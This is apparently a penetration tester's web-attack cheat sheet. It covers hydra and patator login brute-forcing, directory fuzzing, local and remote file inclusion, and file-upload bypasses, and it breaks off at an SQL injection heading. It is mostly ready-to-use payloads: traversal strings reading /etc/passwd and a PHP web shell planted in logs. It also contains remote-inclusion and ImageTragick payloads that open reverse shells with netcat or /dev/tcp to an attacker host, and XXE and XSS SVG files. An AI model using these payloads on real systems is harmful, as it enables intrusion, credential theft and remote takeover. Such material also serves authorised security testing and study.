patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'

# SIMPLE LOGIN GET
hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V

# GET FORM with HTTPS
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"

# SIMPLE LOGIN POST
hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I

# API REST LOGIN POST
hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64

# Password spraying bruteforcer
# https://github.com/x90skysn3k/brutespray
python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5

# Password generator
# https://github.com/edoardottt/longtongue
python3 longtongue.py

https://many-passwords.github.io/

Online hashes cracked

https://www.cmd5.org/
http://hashes.org
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://crackstation.net/
https://crack.sh/
https://hash.help/
https://passwordrecovery.io/
http://cracker.offensive-security.com/
https://md5decrypt.net/en/Sha256/
https://weakpass.com/wordlists
https://hashes.com/en/decrypt/hash

Crawl/Fuzz

# Crawlers
dirhunt https://url.com/
hakrawler -domain https://url.com/
python3 sourcewolf.py -h
gospider -s "https://example.com/" -o output -c 10 -d 1
gospider -S sites.txt -o output -c 10 -d 1
gospider -s "https://example.com/" -o output -c 10 -d 1 --other-source --include-subs

# Fuzzers
# ffuf
# Discover content
ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w six2dez/OneListForAll/onelistforall.txt -u https://url.com/FUZZ
# Headers discover
ffuf -mc all -ac -u https://hackxor.net -w six2dez/OneListForAll/onelistforall.txt -c -H "FUZZ: Hellothereheadertesting123 asd"
# Ffuf - burp
ffuf -replay-proxy http:127.0.0.1:8080
# Fuzzing extensions
# General
.htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.inc
# Backups
'.bak','.bac','.old','.000','.~','.01','._bak','.001','.inc','.Xxx'

# kr
# https://github.com/assetnote/kiterunner
kr brute https://whatever.com/ -w onelistforallmicro.txt -x 100 --fail-status-codes 404
kr scan https://whatever.com/ -w routes-small.kite -A=apiroutes-210228 -x 100 --ignore-length=34

# chameleon
# https://github.com/iustin24/chameleon
./chameleon -u http://testphp.vulnweb.com -a -A

# Best wordlists for fuzzing:
# https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
    - raft-large-directories-lowercase.txt
    - directory-list-2.3-medium.txt
    - RobotsDisallowed/top10000.txt 
# https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithext    - 
# https://github.com/random-robbie/bruteforce-lists
# https://github.com/google/fuzzing/tree/master/dictionaries
# https://github.com/six2dez/OneListForAll
# AIO: https://github.com/foospidy/payloads
# Check https://wordlists.assetnote.io/

# Pro tip: set "Host: localhost" as header
    
# Custom generated dictionary
gau example.com | unfurl -u paths
# Get files only
sed 's#/#\n#g' paths.txt |sort -u
# Other things
gau example.com | unfurl -u keys
gau example.com | head -n 1000 |fff -s 200 -s 404

# Hadrware devices admin panel
# https://github.com/InfosecMatter/default-http-login-hunter
default-http-login-hunter.sh https://10.10.0.1:443/

# Dirsearch
dirsearch -r -f -u https://10.11.1.111 --extensions=htm,html,asp,aspx,txt -w six2dez/OneListForAll/onelistforall.txt --request-by-hostname -t 40

# dirb
dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt

# wfuzz
wfuzz -c -z file,six2dez/OneListForAll/onelistforall.txt --hc 404 http://10.11.1.11/FUZZ

# gobuster
gobuster dir -u http://10.11.1.111 -w six2dez/OneListForAll/onelistforall.txt -s '200,204,301,302,307,403,500' -e

# Cansina
# https://github.com/deibit/cansina
python3 cansina.py -u example.com -p PAYLOAD

# Ger endpoints from JS
# LinkFinder
# https://github.com/GerbenJavado/LinkFinder
python linkfinder.py -i https://example.com -d
python linkfinder.py -i burpfile -b

# JS enumeration
# https://github.com/KathanP19/JSFScan.sh

# Tip, if 429 add one of these headers:
Client-Ip: IP
X-Client-Ip: IP
X-Forwarded-For: IP
X-Forwarded-For: 127.0.0.1

LFI/RFI

Tools

# https://github.com/kurobeats/fimap
fimap -u "http://10.11.1.111/example.php?test="
# https://github.com/P0cL4bs/Kadimus
./kadimus -u localhost/?pg=contact -A my_user_agent
# https://github.com/wireghoul/dotdotpwn
dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
# Apache specific: https://github.com/imhunterand/ApachSAL

How to

1. Look requests with filename like include=main.inc template=/en/sidebar file=foo/file1.txt
2. Modify and test: file=foo/bar/../file1.txt
   1. If the response is the same could be vulnerable
   2. If not there is some kind of block or sanitizer
3. Try to access world-readable files like /etc/passwd /win.ini

LFI

# Basic LFI
curl -s http://10.11.1.111/gallery.php?page=/etc/passwd

# If LFI, also check
/var/run/secrets/kubernetes.io/serviceaccount

# PHP Filter b64
http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
http://10.11.1.111/maliciousfile.txt%00?page=php://filter/convert.base64-encode/resource=../config.php
# Nullbyte ending
http://10.11.1.111/page=http://10.11.1.111/maliciousfile%00.txt
http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00
# Other techniques
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd
https://abc.redact.com/static/../../../../../../../../../../../../../../../etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd
https://abc.redact.com/asd.php?file:///etc/passwd%00
https://abc.redact.com/asd.php?file:///etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd%00.ext
https://abc.redact.com/asd.php?file:///..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext/etc/passwd
https://target.com/admin..;/
https://target.com/../admin
https://target.com/whatever/..;/admin
https://target.com/whatever.php~
# Cookie based
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd
# LFI Windows
http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini
http://10.11.1.111/addguestbook.php?LANG=../../../../../../../../../../../../../../../boot.ini
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=file:///C:/boot.ini
http://10.11.1.111/addguestbook.php?LANG=file:///C:/win.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.ext
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.ext

# LFI using video upload:
https://github.com/FFmpeg/FFmpeg
https://hackerone.com/reports/226756
https://hackerone.com/reports/237381
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit
https://github.com/neex/ffmpeg-avi-m3u-xbin

# Contaminating log files
root@kali:~# nc -v 10.11.1.111 80
10.11.1.111: inverse host lookup failed: Unknown host
(UNKNOWN) [10.11.1.111] 80 (http) open
 <?php echo shell_exec($_GET['cmd']);?> 
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig

# Common LFI to RCE:
    Using file upload forms/functions
    Using the PHP wrapper expect://command
    Using the PHP wrapper php://file
    Using the PHP wrapper php://filter
    Using PHP input:// stream
    Using data://text/plain;base64,command
    Using /proc/self/environ
    Using /proc/self/fd
    Using log files with controllable input like:
        /var/log/apache/access.log
        /var/log/apache/error.log
        /var/log/vsftpd.log
        /var/log/sshd.log
        /var/log/mail

# LFI possibilities by filetype
    ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
    SVG: Stored XSS / SSRF / XXE
    GIF: Stored XSS / SSRF
    CSV: CSV injection
    XML: XXE
    AVI: LFI / SSRF
    HTML / JS : HTML injection / XSS / Open redirect
    PNG / JPEG: Pixel flood attack (DoS)
    ZIP: RCE via LFI / DoS
    PDF / PPTX: SSRF / BLIND XXE
    
# Chaining with other vulns    
../../../tmp/lol.png —> for path traversal
sleep(10)-- -.jpg —> for SQL injection
<svg onload=alert(document.domain)>.jpg/png —> for XSS
; sleep 10; —> for command injections

# 403 bypasses
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
/secret/
/secret/.
//secret//
/./secret/..
/admin..;/
/admin%20/
/%20admin%20/
/admin%20/page
/%61dmin

# Path Bypasses
# 16-bit Unicode encoding
# double URL encoding
# overlong UTF-8 Unicode encoding
….//
….\/
…./\
….\\

RFI

# RFI:
http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
Content of evil.txt:
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
# RFI over SMB (Windows)
cat php_cmd.php
    <?php echo shell_exec($_GET['cmd']);?>
# Start SMB Server in attacker machine and put evil script
# Access it via browser (2 request attack):
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234

# Cross Content Hijacking:
https://github.com/nccgroup/CrossSiteContentHijacking
https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
http://50.56.33.56/blog/?p=242

# Encoding scripts in PNG IDAT chunk:
https://yqh.at/scripts_in_pngs.php

File upload

# File name validation
    # extension blacklisted:
    PHP: .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
    ASP: .asp, .aspx, .cer, .asa
    Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
    Coldfusion: .cfm, .cfml, .cfc, .dbm
    Using random capitalization: .pHp, .pHP5, .PhAr
    pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,phar,pgif,inc
    # extension whitelisted:
    file.jpg.php
    file.php.jpg
    file.php.blah123jpg
    file.php%00.jpg
    file.php\x00.jpg
    file.php%00
    file.php%20
    file.php%0d%0a.jpg
    file.php.....
    file.php/
    file.php.\
    file.
    .html
# Content type bypass
    - Preserve name, but change content-type
    Content-Type: image/jpeg, image/gif, image/png
# Content length:
    # Small bad code:
    <?='$_GET[x]'?>
    
# Impact by extension
asp, aspx, php5, php, php3: webshell, rce
svg: stored xss, ssrf, xxe
gif: stored xss, ssrf
csv: csv injection
xml: xxe
avi: lfi, ssrf
html, js: html injection, xss, open redirect
png, jpeg: pixel flood attack dos
zip: rce via lfi, dos
pdf, pptx: ssrf, blind xxe

# Path traversal
../../etc/passwd/logo.png
../../../logo.png

# SQLi
'sleep(10).jpg
sleep(10)-- -.jpg

# Command injection
; sleep 10;

# ImageTragick
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

# XXE .svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>

# XSS svg
<svg onload=alert(document.comain)>.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
File Upload Checklist 3
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>

# Open redirect svg
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
    
# Filter Bypassing Techniques
# upload asp file using .cer & .asa extension (IIS — Windows)
# Upload .eml file when content-type = text/HTML
# Inject null byte shell.php%001.jpg
# Check for .svg file upload you can achieve stored XSS using XML payload
# put file name ../../logo.png or ../../etc/passwd/logo.png to get directory traversal via upload file
# Upload large size file for DoS attack test using the image.
# (magic number) upload shell.php change content-type to image/gif and start content with GIF89a; will do the job!
# If web app allows for zip upload then rename the file to pwd.jpg bcoz developer handle it via command
# upload the file using SQL command 'sleep(10).jpg you may achieve SQL if image directly saves to DB.

# Advance Bypassing techniques
# Imagetragick aka ImageMagick:
https://mukarramkhalid.com/imagemagick-imagetragick-exploit/
https://github.com/neex/gifoeb
    
# Upload file tool
https://github.com/almandin/fuxploider
python3 fuxploider.py --url https://example.com --not-regex "wrong file type"

https://github.com/sAjibuu/upload_bypass

Cheatsheet

upload.random123		---	To test if random file extensions can be uploaded.
upload.php			---	try to upload a simple php file.
upload.php.jpeg 		--- 	To bypass the blacklist.
upload.jpg.php 			---	To bypass the blacklist. 
upload.php 			---	and Then Change the content type of the file to image or jpeg.
upload.php*			---	version - 1 2 3 4 5 6 7.
upload.PHP			---	To bypass The BlackList.
upload.PhP			---	To bypass The BlackList.
upload.pHp			---	To bypass The BlackList.
upload .htaccess 		--- 	By uploading this [jpg,png] files can be executed as php with milicious code within it.
pixelFlood.jpg			---	To test againt the DOS.
frameflood.gif			---	upload gif file with 10^10 Frames
Malicious zTXT  		--- 	upload UBER.jpg 
Upload zip file			---	test againts Zip slip (only when file upload supports zip file)
Check Overwrite Issue		--- 	Upload file.txt and file.txt with different content and check if 2nd file.txt overwrites 1st file
SVG to XSS			---	Check if you can upload SVG files and can turn them to cause XSS on the target app
SQLi Via File upload		---	Try uploading `sleep(10)-- -.jpg` as file

SQLi

https://portswigger.net/web-security/sql-injection/cheat-sheet

https://sqlwiki.netspi.com/#mysql

Common